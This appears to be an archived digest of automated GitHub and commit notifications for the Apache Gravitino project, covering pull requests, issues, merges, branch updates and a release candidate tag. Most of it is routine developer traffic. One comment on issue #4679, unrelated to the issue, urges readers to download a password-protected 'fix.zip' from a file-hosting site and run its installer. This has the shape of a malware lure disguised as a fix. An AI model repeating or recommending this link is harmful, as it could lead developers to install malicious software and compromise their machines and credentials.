Re: [I] [Improvement] Support loading custom catalog as backend in Gravitino Iceberg catalog [gravitino]

2024-08-26 Thread via GitHub
FANNG1 closed issue #4584: [Improvement] Support loading custom catalog as backend in Gravitino Iceberg catalog URL: https://github.com/apache/gravitino/issues/4584 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL

Re: [PR] [#4662] improve(IT): Add ranger authorization Hive E2E test [gravitino]

2024-08-26 Thread via GitHub
mchades commented on code in PR #4651: URL: https://github.com/apache/gravitino/pull/4651#discussion_r1730787866 ## catalogs/catalog-kafka/src/main/java/org/apache/gravitino/catalog/kafka/KafkaCatalogPropertiesMetadata.java: ## @@ -30,13 +30,17 @@ public class KafkaCatalogProper

Re: [PR] [Bug] Avoid OOM (Out of Memory) for Playground-gravitino [gravitino-playground]

2024-08-26 Thread via GitHub
beryllw closed pull request #66: [Bug] Avoid OOM (Out of Memory) for Playground-gravitino URL: https://github.com/apache/gravitino-playground/pull/66 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to

Re: [PR] [Bug] Avoid OOM (Out of Memory) for Playground-gravitino [gravitino-playground]

2024-08-26 Thread via GitHub
beryllw commented on PR #66: URL: https://github.com/apache/gravitino-playground/pull/66#issuecomment-2309499660 > 1. In which case you will get the OOM error? Use gravitino-playground default config and refresh the gravitino homepage several times, I couldn't reproduce this time.

Re: [PR] [#4662] improve(IT): Add ranger authorization Hive E2E test [gravitino]

2024-08-26 Thread via GitHub
jerryshao merged PR #4651: URL: https://github.com/apache/gravitino/pull/4651 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: commits-unsubscr...@gravit

(gravitino) branch main updated: [#4662] improve(IT): Add ranger authorization Hive E2E test (#4651)

2024-08-26 Thread jshao
This is an automated email from the ASF dual-hosted git repository. jshao pushed a commit to branch main in repository https://gitbox.apache.org/repos/asf/gravitino.git The following commit(s) were added to refs/heads/main by this push: new 37952857a [#4662] improve(IT): Add ranger authoriz

[PR] TEST [gravitino]

2024-08-26 Thread via GitHub
FANNG1 opened a new pull request, #4676: URL: https://github.com/apache/gravitino/pull/4676 ### What changes were proposed in this pull request? (Please outline the changes and how this PR fixes the issue.) ### Why are the changes needed? (Please clarify why the c

[PR] [#4662] improve(IT): Add ranger authorization Hive E2E test [gravitino]

2024-08-26 Thread via GitHub
xunliu opened a new pull request, #4677: URL: https://github.com/apache/gravitino/pull/4677 ### What changes were proposed in this pull request? 1. Use an isolated class loader to create an authorization Ranger plugin. 2. Add authorization for Hive E2E tests using Ranger via Graviti

Re: [PR] TEST [gravitino]

2024-08-26 Thread via GitHub
FANNG1 closed pull request #4676: TEST URL: https://github.com/apache/gravitino/pull/4676 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: commits-unsubs

Re: [I] [Subtask] Add code skeleton for Hudi catalog [gravitino]

2024-08-26 Thread via GitHub
seeronline commented on issue #4679: URL: https://github.com/apache/gravitino/issues/4679#issuecomment-2309587824 Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc." -- This is an automated message from the

Re: [PR] TEST [gravitino]

2024-08-26 Thread via GitHub
FANNG1 closed pull request #4676: TEST URL: https://github.com/apache/gravitino/pull/4676 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: commits-unsubs

[I] [FEATURE] Encrypt sensitive data in the catalog properties [gravitino]

2024-08-26 Thread via GitHub
diqiu50 opened a new issue, #4681: URL: https://github.com/apache/gravitino/issues/4681 ### Describe the feature The catalog properties may store some sensitive data, like MySQL passwords and AWS secret keys, which need to be encrypted. ### Motivation _No response_

Re: [PR] [#4662] improve(IT): Add ranger authorization Hive E2E test [gravitino]

2024-08-26 Thread via GitHub
xunliu commented on PR #4677: URL: https://github.com/apache/gravitino/pull/4677#issuecomment-2309630616 @yuqi1129 @jerryshao Please help me review this PR, Thanks. -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the U

Re: [PR] [#4584]feat(catalog-iceberg) Support loading custom catalog as backend in Gravitino Iceberg catalog [gravitino]

2024-08-26 Thread via GitHub
theoryxu commented on PR #4680: URL: https://github.com/apache/gravitino/pull/4680#issuecomment-2309628544 In my case, I can reuse the JDBC catalog configurations for my custom catalog, but this approach doesn't cover other custom catalogs. Now, we need to enumerate all configuration

Re: [PR] [#4662] improve(IT): Add ranger authorization Hive E2E test [gravitino]

2024-08-26 Thread via GitHub
jerryshao merged PR #4677: URL: https://github.com/apache/gravitino/pull/4677 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: commits-unsubscr...@gravit

(gravitino) branch branch-0.6 updated: [#4662] improve(IT): Add ranger authorization Hive E2E test (#4677)

2024-08-26 Thread jshao
This is an automated email from the ASF dual-hosted git repository. jshao pushed a commit to branch branch-0.6 in repository https://gitbox.apache.org/repos/asf/gravitino.git The following commit(s) were added to refs/heads/branch-0.6 by this push: new d3f26c63a [#4662] improve(IT): Add ran

Re: [PR] [MINOR] Add originator of Gravitino to the NOTICE file [gravitino]

2024-08-26 Thread via GitHub
jerryshao commented on code in PR #4670: URL: https://github.com/apache/gravitino/pull/4670#discussion_r1730948197 ## NOTICE: ## @@ -4,8 +4,10 @@ Copyright 2024 The Apache Software Foundation This product includes software developed at The Apache Software Foundation (http://ww

(gravitino) tag v0.6.0-incubating-rc3 created (now 0962ba6fb)

2024-08-26 Thread jshao
This is an automated email from the ASF dual-hosted git repository. jshao pushed a change to tag v0.6.0-incubating-rc3 in repository https://gitbox.apache.org/repos/asf/gravitino.git at 0962ba6fb (commit) This tag includes the following new commits: new 0962ba6fb Preparing Gravitino

(gravitino) 01/01: Preparing development version 0.6.1-incubating-SNAPSHOT

2024-08-26 Thread jshao
This is an automated email from the ASF dual-hosted git repository. jshao pushed a commit to branch branch-0.6 in repository https://gitbox.apache.org/repos/asf/gravitino.git commit 8518bbe10bdd4589639b093436e9e5cfc0fd97d9 Author: Jerry Shao AuthorDate: Mon Aug 26 17:15:52 2024 +0800 Prepar

(gravitino) 01/01: Preparing Gravitino release v0.6.0-incubating-rc3

2024-08-26 Thread jshao
This is an automated email from the ASF dual-hosted git repository. jshao pushed a commit to tag v0.6.0-incubating-rc3 in repository https://gitbox.apache.org/repos/asf/gravitino.git commit 0962ba6fb44567b34080ede4c5ac6fb567829654 Author: Jerry Shao AuthorDate: Mon Aug 26 17:15:52 2024 +0800

(gravitino) branch branch-0.6 updated (d3f26c63a -> 8518bbe10)

2024-08-26 Thread jshao
This is an automated email from the ASF dual-hosted git repository. jshao pushed a change to branch branch-0.6 in repository https://gitbox.apache.org/repos/asf/gravitino.git from d3f26c63a [#4662] improve(IT): Add ranger authorization Hive E2E test (#4677) add 0962ba6fb Preparing Grav

svn commit: r71098 - /dev/incubator/gravitino/v0.6.0-incubating-rc3/

2024-08-26 Thread jshao
Author: jshao Date: Mon Aug 26 09:26:06 2024 New Revision: 71098 Log: Apache Gravitino v0.6.0-incubating-rc3 Added: dev/incubator/gravitino/v0.6.0-incubating-rc3/ dev/incubator/gravitino/v0.6.0-incubating-rc3/apache_gravitino-0.6.0.tar.gz (with props) dev/incubator/gravitino/v0.6.

Re: [PR] remove integration-test module [gravitino]

2024-08-26 Thread via GitHub
mchades closed pull request #4682: remove integration-test module URL: https://github.com/apache/gravitino/pull/4682 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscr

Re: [PR] [#4520] Imporvement(jdbc-catalogs): Shrink JDBC catalog binary package size to about 3MB. [gravitino]

2024-08-26 Thread via GitHub
jerryshao commented on code in PR #4521: URL: https://github.com/apache/gravitino/pull/4521#discussion_r1730980572 ## catalogs/catalog-jdbc-mysql/build.gradle.kts: ## @@ -25,30 +25,36 @@ plugins { } dependencies { - implementation(project(":api")) - implementation(project(

[PR] [Test] Test timeout problem in branch-0.6 [gravitino]

2024-08-26 Thread via GitHub
yuqi1129 opened a new pull request, #4683: URL: https://github.com/apache/gravitino/pull/4683 ### What changes were proposed in this pull request? (Please outline the changes and how this PR fixes the issue.) ### Why are the changes needed? (Please clarify why the

Re: [PR] [#4584]feat(catalog-iceberg) Support loading custom catalog as backend in Gravitino Iceberg catalog [gravitino]

2024-08-26 Thread via GitHub
FANNG1 commented on PR #4680: URL: https://github.com/apache/gravitino/pull/4680#issuecomment-2309790657 > In my case, I can reuse the JDBC catalog configurations for my custom catalog, but this approach doesn't cover other custom catalogs. > > Now, we need to enumerate all configurat

Re: [PR] [#4520] Imporvement(jdbc-catalogs): Shrink JDBC catalog binary package size to about 3MB. [gravitino]

2024-08-26 Thread via GitHub
yuqi1129 commented on code in PR #4521: URL: https://github.com/apache/gravitino/pull/4521#discussion_r1730997605 ## catalogs/catalog-jdbc-mysql/build.gradle.kts: ## @@ -25,30 +25,36 @@ plugins { } dependencies { - implementation(project(":api")) - implementation(project("

Re: [PR] [#4520] Imporvement(jdbc-catalogs): Shrink JDBC catalog binary package size to about 3MB. [gravitino]

2024-08-26 Thread via GitHub
yuqi1129 commented on code in PR #4521: URL: https://github.com/apache/gravitino/pull/4521#discussion_r1731002080 ## catalogs/catalog-jdbc-mysql/build.gradle.kts: ## @@ -25,30 +25,36 @@ plugins { } dependencies { - implementation(project(":api")) - implementation(project("

[PR] [#4675] improvement(core): make catalog property metadata automatically add [gravitino]

2024-08-26 Thread via GitHub
mchades opened a new pull request, #4684: URL: https://github.com/apache/gravitino/pull/4684 ### What changes were proposed in this pull request? make catalog property metadata automatically add ### Why are the changes needed? catalog developer can now focus on the defini

Re: [PR] Issue #4305 Added default statements to 4 switch case statements [gravitino]

2024-08-26 Thread via GitHub
jerryshao commented on PR #4668: URL: https://github.com/apache/gravitino/pull/4668#issuecomment-2309928060 Hi @manoharbvk Thanks for your contribution. Would you follow our PR title and description template to update them? Also you can follow this commit (https://github.com/apache/g

Re: [I] [Improvement] Shrink JDBC catalog binary package size. [gravitino]

2024-08-26 Thread via GitHub
jerryshao closed issue #4520: [Improvement] Shrink JDBC catalog binary package size. URL: https://github.com/apache/gravitino/issues/4520 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific

Re: [I] [Improvement] Shrink JDBC catalog binary package size. [gravitino]

2024-08-26 Thread via GitHub
jerryshao closed issue #4520: [Improvement] Shrink JDBC catalog binary package size. URL: https://github.com/apache/gravitino/issues/4520 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific

Re: [PR] [#4520] Imporvement(jdbc-catalogs): Shrink JDBC catalog binary package size to about 3MB. [gravitino]

2024-08-26 Thread via GitHub
jerryshao merged PR #4521: URL: https://github.com/apache/gravitino/pull/4521 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: commits-unsubscr...@gravit

(gravitino) branch main updated: [#4520] Imporvement(jdbc-catalogs): Shrink JDBC catalog binary package size to about 3MB. (#4521)

2024-08-26 Thread jshao
This is an automated email from the ASF dual-hosted git repository. jshao pushed a commit to branch main in repository https://gitbox.apache.org/repos/asf/gravitino.git The following commit(s) were added to refs/heads/main by this push: new 0af3353fb [#4520] Imporvement(jdbc-catalogs): Shri

Re: [PR] [#4528] improvement(hive-catalog): reduce hive catalog libs size from 146MB to 76MB [gravitino]

2024-08-26 Thread via GitHub
jerryshao commented on PR #4531: URL: https://github.com/apache/gravitino/pull/4531#issuecomment-2309945374 Can you please list all the jars after you excluded @mchades? -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use

Re: [PR] [#4525] improvement(catalog-hadoop): Shrink Hadoop catalog binary package size to 44MB. [gravitino]

2024-08-26 Thread via GitHub
jerryshao commented on PR #4535: URL: https://github.com/apache/gravitino/pull/4535#issuecomment-2309948129 @yuqi1129 , can you please all the jars are you excluded? -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the

[I] [Bug report] React inline style - style prop expects a mapping from style properties to values, not a string [gravitino]

2024-08-26 Thread via GitHub
LauraXia123 opened a new issue, #4685: URL: https://github.com/apache/gravitino/issues/4685 ### Version main branch ### Describe what's wrong Setting inline styles in my React application. In this case, for a img `https://analytics.apache.org/matomo.php?idsite=62&rec=1

Re: [PR] [#4530] improvement(kafka-catalog): reduce kafka catalog libs size from 91MB to 17MB [gravitino]

2024-08-26 Thread via GitHub
jerryshao commented on PR #4532: URL: https://github.com/apache/gravitino/pull/4532#issuecomment-2309963382 Can you please list all the jars after you excluded, @mchades ? -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and us

[PR] [#4685] fix docs img inline style issue [gravitino]

2024-08-26 Thread via GitHub
LauraXia123 opened a new pull request, #4686: URL: https://github.com/apache/gravitino/pull/4686 ### What changes were proposed in this pull request? make sure to set inline styles in my React application for img ### Why are the changes needed? N/A Fix: #4685

(gravitino) branch main updated: [#4685] fix docs img inline style issue (#4686)

2024-08-26 Thread jshao
This is an automated email from the ASF dual-hosted git repository. jshao pushed a commit to branch main in repository https://gitbox.apache.org/repos/asf/gravitino.git The following commit(s) were added to refs/heads/main by this push: new 8fc8ea970 [#4685] fix docs img inline style issue

Re: [I] [Bug report] React inline style - style prop expects a mapping from style properties to values, not a string [gravitino]

2024-08-26 Thread via GitHub
jerryshao closed issue #4685: [Bug report] React inline style - style prop expects a mapping from style properties to values, not a string URL: https://github.com/apache/gravitino/issues/4685 -- This is an automated message from the Apache Git Service. To respond to the message, please log on

(gravitino) branch cherry-pick-branch-0.6-8fc8ea9707c01c32ab059c168726c97dc2d34dca created (now 660671b88)

2024-08-26 Thread github-bot
This is an automated email from the ASF dual-hosted git repository. github-bot pushed a change to branch cherry-pick-branch-0.6-8fc8ea9707c01c32ab059c168726c97dc2d34dca in repository https://gitbox.apache.org/repos/asf/gravitino.git at 660671b88 [#4685] fix docs img inline style issue (#4

Re: [I] [Bug report] React inline style - style prop expects a mapping from style properties to values, not a string [gravitino]

2024-08-26 Thread via GitHub
jerryshao closed issue #4685: [Bug report] React inline style - style prop expects a mapping from style properties to values, not a string URL: https://github.com/apache/gravitino/issues/4685 -- This is an automated message from the Apache Git Service. To respond to the message, please log on

Re: [PR] [#4685] fix docs img inline style issue [gravitino]

2024-08-26 Thread via GitHub
jerryshao merged PR #4686: URL: https://github.com/apache/gravitino/pull/4686 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: commits-unsubscr...@gravit

[PR] [#4685] fix docs img inline style issue [gravitino]

2024-08-26 Thread via GitHub
github-actions[bot] opened a new pull request, #4687: URL: https://github.com/apache/gravitino/pull/4687 ### What changes were proposed in this pull request? make sure to set inline styles in my React application for img and show the content of docs https://github.com/user-atta

Re: [PR] [#4685] fix docs img inline style issue [gravitino]

2024-08-26 Thread via GitHub
jerryshao closed pull request #4687: [#4685] fix docs img inline style issue URL: https://github.com/apache/gravitino/pull/4687 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment.

Re: [PR] [#4101] feat(core): Support PG backend [gravitino]

2024-08-26 Thread via GitHub
jerryshao commented on code in PR #4611: URL: https://github.com/apache/gravitino/pull/4611#discussion_r1731116809 ## core/src/main/java/org/apache/gravitino/storage/relational/mapper/CatalogMetaPGProvider.java: ## @@ -0,0 +1,21 @@ +/* + * Licensed to the Apache Software Foundat

Re: [PR] [#4101] feat(core): Support PG backend [gravitino]

2024-08-26 Thread via GitHub
jerryshao commented on PR #4611: URL: https://github.com/apache/gravitino/pull/4611#issuecomment-2310002380 I'm OK with the current solution, you can go ahead, @yuqi1129 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use

Re: [PR] [#4685] fix docs img inline style issue [gravitino]

2024-08-26 Thread via GitHub
jerryshao merged PR #4687: URL: https://github.com/apache/gravitino/pull/4687 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: commits-unsubscr...@gravit

(gravitino) branch branch-0.6 updated: [#4685] fix docs img inline style issue (#4687)

2024-08-26 Thread jshao
This is an automated email from the ASF dual-hosted git repository. jshao pushed a commit to branch branch-0.6 in repository https://gitbox.apache.org/repos/asf/gravitino.git The following commit(s) were added to refs/heads/branch-0.6 by this push: new e044eda50 [#4685] fix docs img inline

(gravitino) branch cherry-pick-branch-0.6-8fc8ea9707c01c32ab059c168726c97dc2d34dca deleted (was 660671b88)

2024-08-26 Thread jshao
This is an automated email from the ASF dual-hosted git repository. jshao pushed a change to branch cherry-pick-branch-0.6-8fc8ea9707c01c32ab059c168726c97dc2d34dca in repository https://gitbox.apache.org/repos/asf/gravitino.git was 660671b88 [#4685] fix docs img inline style issue (#4686)

(gravitino) branch branch-0.6 updated: [Minor] improvement(CI): Fix backend tests fail occasionally as a result of CI pipeline timeout. (#4674)

2024-08-26 Thread jshao
This is an automated email from the ASF dual-hosted git repository. jshao pushed a commit to branch branch-0.6 in repository https://gitbox.apache.org/repos/asf/gravitino.git The following commit(s) were added to refs/heads/branch-0.6 by this push: new f45993393 [Minor] improvement(CI): Fix

Re: [PR] [Minor] improvement(CI): Fix backend tests fail occasionally as a result of CI pipeline timeout. [gravitino]

2024-08-26 Thread via GitHub
jerryshao merged PR #4674: URL: https://github.com/apache/gravitino/pull/4674 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: commits-unsubscr...@gravit

Re: [PR] [#4606] Improvement(trino-connector): Possible null pointer expection/code handling [gravitino]

2024-08-26 Thread via GitHub
jerryshao merged PR #4619: URL: https://github.com/apache/gravitino/pull/4619 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: commits-unsubscr...@gravit

Re: [I] [Improvement] Possible null pointer expection/code improvement in CatalogRegister.java [gravitino]

2024-08-26 Thread via GitHub
jerryshao closed issue #4606: [Improvement] Possible null pointer expection/code improvement in CatalogRegister.java URL: https://github.com/apache/gravitino/issues/4606 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the

(gravitino) branch main updated: [#4606] Improvement(trino-connector): Possible null pointer expection/code handling (#4619)

2024-08-26 Thread jshao
This is an automated email from the ASF dual-hosted git repository. jshao pushed a commit to branch main in repository https://gitbox.apache.org/repos/asf/gravitino.git The following commit(s) were added to refs/heads/main by this push: new 1266b79e6 [#4606] Improvement(trino-connector): Po

Re: [I] [Improvement] Possible null pointer expection/code improvement in CatalogRegister.java [gravitino]

2024-08-26 Thread via GitHub
jerryshao closed issue #4606: [Improvement] Possible null pointer expection/code improvement in CatalogRegister.java URL: https://github.com/apache/gravitino/issues/4606 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the

[I] [Bug report] The Trino playground Docker image cannot start up. [gravitino]

2024-08-26 Thread via GitHub
diqiu50 opened a new issue, #4688: URL: https://github.com/apache/gravitino/issues/4688 ### Version main branch ### Describe what's wrong An error occurs during the Docker startup in the Trino playground Docker image. ### Error message and/or stacktrace pla

Re: [PR] [#4530] improvement(kafka-catalog): reduce kafka catalog libs size from 91MB to 17MB [gravitino]

2024-08-26 Thread via GitHub
mchades commented on PR #4532: URL: https://github.com/apache/gravitino/pull/4532#issuecomment-2310054407 @jerryshao FYI before: https://github.com/user-attachments/assets/30932c2a-7ff4-480d-b075-26575c8f8742";> https://github.com/user-attachments/assets/4deb60ca-b42c-47f8-aae3-f919a

Re: [PR] [#4528] improvement(hive-catalog): reduce hive catalog libs size from 146MB to 76MB [gravitino]

2024-08-26 Thread via GitHub
mchades commented on PR #4531: URL: https://github.com/apache/gravitino/pull/4531#issuecomment-2310059487 @jerryshao FYI: before: https://github.com/user-attachments/assets/52474e46-3344-4e2b-9c6d-8005a242d673";> https://github.com/user-attachments/assets/59e021ce-e821-4d5b-827a-5507

[PR] [#4688] fix (docker): Fix the Trino playground Docker image cannot start up [gravitino]

2024-08-26 Thread via GitHub
diqiu50 opened a new pull request, #4689: URL: https://github.com/apache/gravitino/pull/4689 ### What changes were proposed in this pull request? Fix the Trino playground Docker image cannot start up ### Why are the changes needed? Fix: #4688 ### Does this PR intr

Re: [PR] [#4530] improvement(kafka-catalog): reduce kafka catalog libs size from 91MB to 17MB [gravitino]

2024-08-26 Thread via GitHub
jerryshao closed pull request #4532: [#4530] improvement(kafka-catalog): reduce kafka catalog libs size from 91MB to 17MB URL: https://github.com/apache/gravitino/pull/4532 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use

Re: [PR] [#4530] improvement(kafka-catalog): reduce kafka catalog libs size from 91MB to 17MB [gravitino]

2024-08-26 Thread via GitHub
jerryshao commented on PR #4532: URL: https://github.com/apache/gravitino/pull/4532#issuecomment-2310066146 Do we need to exclude runtime guava and slf4j jars like @yuqi1129 did for jdbc catalog? I think our base classloader already provided these jars. -- This is an automated message fro

Re: [PR] [#4688] fix (docker): Fix the Trino playground Docker image cannot start up [gravitino]

2024-08-26 Thread via GitHub
diqiu50 commented on code in PR #4689: URL: https://github.com/apache/gravitino/pull/4689#discussion_r1731157146 ## dev/docker/trino/Dockerfile: ## @@ -66,13 +66,15 @@ COPY --chown=trino:trino packages/gravitino-trino-connector/postgresql-42.7.0.ja RUN mkdir /tmp/gravitino CO

[PR] [#4608] feat(core): Supports to load fields lazily [gravitino]

2024-08-26 Thread via GitHub
jerqi opened a new pull request, #4690: URL: https://github.com/apache/gravitino/pull/4690 ### What changes were proposed in this pull request? Supports to load fileds lazily. ### Why are the changes needed? Fix: #4608 ### Does this PR introduce _any_ user-facing c

Re: [PR] [#4633] refactor(integration-test): remove integration-test module [gravitino]

2024-08-26 Thread via GitHub
mchades commented on code in PR #4628: URL: https://github.com/apache/gravitino/pull/4628#discussion_r1731214672 ## .github/workflows/trino-integration-test.yml: ## @@ -0,0 +1,104 @@ +name: Trino Integration Test + +# Controls when the workflow will run +on: + # Triggers the wo

Re: [I] [Bug report] The Trino playground Docker image cannot start up. [gravitino]

2024-08-26 Thread via GitHub
yuqi1129 closed issue #4688: [Bug report] The Trino playground Docker image cannot start up. URL: https://github.com/apache/gravitino/issues/4688 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the

Re: [I] [Bug report] The Trino playground Docker image cannot start up. [gravitino]

2024-08-26 Thread via GitHub
yuqi1129 closed issue #4688: [Bug report] The Trino playground Docker image cannot start up. URL: https://github.com/apache/gravitino/issues/4688 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the

(gravitino) branch main updated: [#4688] fix (docker): Fix the Trino playground Docker image cannot start up (#4689)

2024-08-26 Thread yuqi4733
This is an automated email from the ASF dual-hosted git repository. yuqi4733 pushed a commit to branch main in repository https://gitbox.apache.org/repos/asf/gravitino.git The following commit(s) were added to refs/heads/main by this push: new 67d0cf5cb [#4688] fix (docker): Fix the Trino p

Re: [PR] [#4688] fix (docker): Fix the Trino playground Docker image cannot start up [gravitino]

2024-08-26 Thread via GitHub
yuqi1129 merged PR #4689: URL: https://github.com/apache/gravitino/pull/4689 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: commits-unsubscr...@graviti

(gravitino) branch cherry-pick-branch-0.6-67d0cf5cb99dcfef5ac1c4ff30807c81ca0c8f35 created (now 81d43f688)

2024-08-26 Thread github-bot
This is an automated email from the ASF dual-hosted git repository. github-bot pushed a change to branch cherry-pick-branch-0.6-67d0cf5cb99dcfef5ac1c4ff30807c81ca0c8f35 in repository https://gitbox.apache.org/repos/asf/gravitino.git at 81d43f688 [#4688] fix (docker): Fix the Trino playgro

[PR] [#4688] fix (docker): Fix the Trino playground Docker image cannot start up [gravitino]

2024-08-26 Thread via GitHub
github-actions[bot] opened a new pull request, #4691: URL: https://github.com/apache/gravitino/pull/4691 ### What changes were proposed in this pull request? Fix the Trino playground Docker image cannot start up ### Why are the changes needed? Fix: #4688 ### Does

Re: [PR] [#4688] fix (docker): Fix the Trino playground Docker image cannot start up [gravitino]

2024-08-26 Thread via GitHub
jerryshao closed pull request #4691: [#4688] fix (docker): Fix the Trino playground Docker image cannot start up URL: https://github.com/apache/gravitino/pull/4691 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL a

Re: [I] [Subtask] Add ranger authorization Hive E2E test [gravitino]

2024-08-26 Thread via GitHub
jerryshao closed issue #4662: [Subtask] Add ranger authorization Hive E2E test URL: https://github.com/apache/gravitino/issues/4662 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific commen

Re: [I] [Subtask] [spark-connector] support Paimon catalog [gravitino]

2024-08-26 Thread via GitHub
caican00 commented on issue #2404: URL: https://github.com/apache/gravitino/issues/2404#issuecomment-2310384208 > @caican00, you could create subtasks for this issue to make other contributors have chance to contribute. got it. -- This is an automated message from the Apache Git Se

Re: [PR] [#4525] improvement(catalog-hadoop): Shrink Hadoop catalog binary package size to 44MB. [gravitino]

2024-08-26 Thread via GitHub
yuqi1129 commented on PR #4535: URL: https://github.com/apache/gravitino/pull/4535#issuecomment-2310414783 > @yuqi1129 , can you please list all the jars are you excluded? Yeah. The following picture are all jars after optimization. ![image](https://github.com/user-attachme

[PR] [Minor] fix(docker-image): Fix bugs in publishing Iceberg rest server docker image [gravitino]

2024-08-26 Thread via GitHub
yuqi1129 opened a new pull request, #4692: URL: https://github.com/apache/gravitino/pull/4692 ### What changes were proposed in this pull request? Fix the bugs about github environment for image_type ### Why are the changes needed? it's a bug. ### Does this PR

[PR] [Minor] fix(docker-image): Fix bugs in publishing Iceberg rest server docker image [gravitino]

2024-08-26 Thread via GitHub
github-actions[bot] opened a new pull request, #4693: URL: https://github.com/apache/gravitino/pull/4693 ### What changes were proposed in this pull request? Fix the bugs about github environment for image_type ### Why are the changes needed? it's a bug. ### Do

(gravitino) branch cherry-pick-branch-0.6-2ac2f3a6649f0504e6d37e7ca1e7cbc868fe61ac created (now eb6b10699)

2024-08-26 Thread github-bot
This is an automated email from the ASF dual-hosted git repository. github-bot pushed a change to branch cherry-pick-branch-0.6-2ac2f3a6649f0504e6d37e7ca1e7cbc868fe61ac in repository https://gitbox.apache.org/repos/asf/gravitino.git at eb6b10699 [Minor] fix(docker-image): Fix bugs in publ

Re: [PR] [Minor] fix(docker-image): Fix bugs in publishing Iceberg rest server docker image [gravitino]

2024-08-26 Thread via GitHub
yuqi1129 closed pull request #4693: [Minor] fix(docker-image): Fix bugs in publishing Iceberg rest server docker image URL: https://github.com/apache/gravitino/pull/4693 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the

Re: [PR] [Minor] fix(docker-image): Fix bugs in publishing Iceberg rest server docker image [gravitino]

2024-08-26 Thread via GitHub
yuqi1129 merged PR #4692: URL: https://github.com/apache/gravitino/pull/4692 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: commits-unsubscr...@graviti

(gravitino) branch main updated: [Minor] fix(docker-image): Fix bugs in publishing Iceberg rest server docker image (#4692)

2024-08-26 Thread yuqi4733
This is an automated email from the ASF dual-hosted git repository. yuqi4733 pushed a commit to branch main in repository https://gitbox.apache.org/repos/asf/gravitino.git The following commit(s) were added to refs/heads/main by this push: new 2ac2f3a66 [Minor] fix(docker-image): Fix bugs i

Re: [PR] [Minor] fix(docker-image): Fix bugs in publishing Iceberg rest server docker image [gravitino]

2024-08-26 Thread via GitHub
yuqi1129 merged PR #4693: URL: https://github.com/apache/gravitino/pull/4693 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: commits-unsubscr...@graviti

(gravitino) branch branch-0.6 updated: [Minor] fix(docker-image): Fix bugs in publishing Iceberg rest server docker image (#4693)

2024-08-26 Thread yuqi4733
This is an automated email from the ASF dual-hosted git repository. yuqi4733 pushed a commit to branch branch-0.6 in repository https://gitbox.apache.org/repos/asf/gravitino.git The following commit(s) were added to refs/heads/branch-0.6 by this push: new 45cb8035b [Minor] fix(docker-image)

(gravitino) branch cherry-pick-branch-0.6-2ac2f3a6649f0504e6d37e7ca1e7cbc868fe61ac deleted (was eb6b10699)

2024-08-26 Thread yuqi4733
This is an automated email from the ASF dual-hosted git repository. yuqi4733 pushed a change to branch cherry-pick-branch-0.6-2ac2f3a6649f0504e6d37e7ca1e7cbc868fe61ac in repository https://gitbox.apache.org/repos/asf/gravitino.git was eb6b10699 [Minor] fix(docker-image): Fix bugs in publis

(gravitino) branch cherry-pick-branch-0.6-67d0cf5cb99dcfef5ac1c4ff30807c81ca0c8f35 deleted (was 81d43f688)

2024-08-26 Thread yuqi4733
This is an automated email from the ASF dual-hosted git repository. yuqi4733 pushed a change to branch cherry-pick-branch-0.6-67d0cf5cb99dcfef5ac1c4ff30807c81ca0c8f35 in repository https://gitbox.apache.org/repos/asf/gravitino.git was 81d43f688 [#4688] fix (docker): Fix the Trino playgroun

Re: [PR] [#4688] fix (docker): Fix the Trino playground Docker image cannot start up [gravitino]

2024-08-26 Thread via GitHub
yuqi1129 merged PR #4691: URL: https://github.com/apache/gravitino/pull/4691 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: commits-unsubscr...@graviti

(gravitino) branch branch-0.6 updated: [#4688] fix (docker): Fix the Trino playground Docker image cannot start up (#4691)

